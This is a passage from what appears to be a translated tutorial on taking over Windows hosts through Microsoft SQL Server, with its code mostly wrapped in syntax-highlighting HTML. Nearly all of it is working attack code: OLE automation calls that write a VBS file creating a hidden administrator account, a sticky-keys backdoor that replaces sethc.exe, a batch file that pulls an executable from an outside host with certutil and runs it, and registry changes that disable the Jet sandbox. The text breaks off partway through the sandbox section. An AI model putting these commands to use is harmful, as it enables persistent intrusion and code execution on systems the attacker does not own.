!important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@t</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'scripting.filesystemobject'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'createtextfile'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 
20px;font-size: 13px !important;white-space: inherit !important;">out</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'d:\RECYCLER\1.vbs'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'os="WinNT://"&wsnetwork.ComputerName'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set ob=GetObject(os)'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set oe=GetObject(os&"/Administrators,group")'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set od=ob.Create("user","123$")'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'od.SetPassword "123"'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'od.SetInfo'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set of=GetObject(os&"/123$",user)'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'oe.add os&"/123$"'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>
   1. Sticky keys replacement

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>declare @o int</code></p></li>
    <li><p><code>exec sp_oacreate 'scripting.filesystemobject', @o out</code></p></li>
    <li><p><code>exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';</code></p></li>
    <li><p><code>declare @o int</code></p></li>
    <li><p><code>exec sp_oacreate 'scripting.filesystemobject', @o out</code></p></li>
    <li><p><code>exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';</code></p></li>
   </ol>

You can apply this flexibly; here it can also be written out as a VBS or something else to download a file. Why not call cmd directly to do the download? On a 2008 system that did not work for me, but sp_oacreate can launch the file, so take a different route.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>declare @sp_passwordxieo int, @f int, @t int, @ret int;</code></p></li>
    <li><p><code>exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out;</code></p></li>
    <li><p><code>exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'c:\www\1.bat', 1;</code></p></li>
    <li><p><code>exec @ret = sp_oamethod @f, 'writeline', NULL,'@echo off';</code></p></li>
    <li><p><code>exec @ret = sp_oamethod @f, 'writeline', NULL,'start cmd /k "cd c:\www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe"';</code></p></li>
    <li><p><br></p></li>
    <li><p><code>declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\www\1.bat'</code></p></li>
    <li><p><br></p></li>
    <li><p><code>declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\www\file.exe'</code></p></li>
   </ol>

Of course, this is only one approach; you could just as well use VBS to download something, and so on.

0x02 Sandbox

Because of environment issues I will not demonstrate this one here.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">..</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_regwrite </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'HKEY_LOCAL_MACHINE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: 
border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SandBoxMode'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'REG_DWORD'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dbo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_regread </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'HKEY_LOCAL_MACHINE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 
13px !important;white-space: inherit !important;">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SandBoxMode'</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">3.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">From</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">OpenRowSet</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
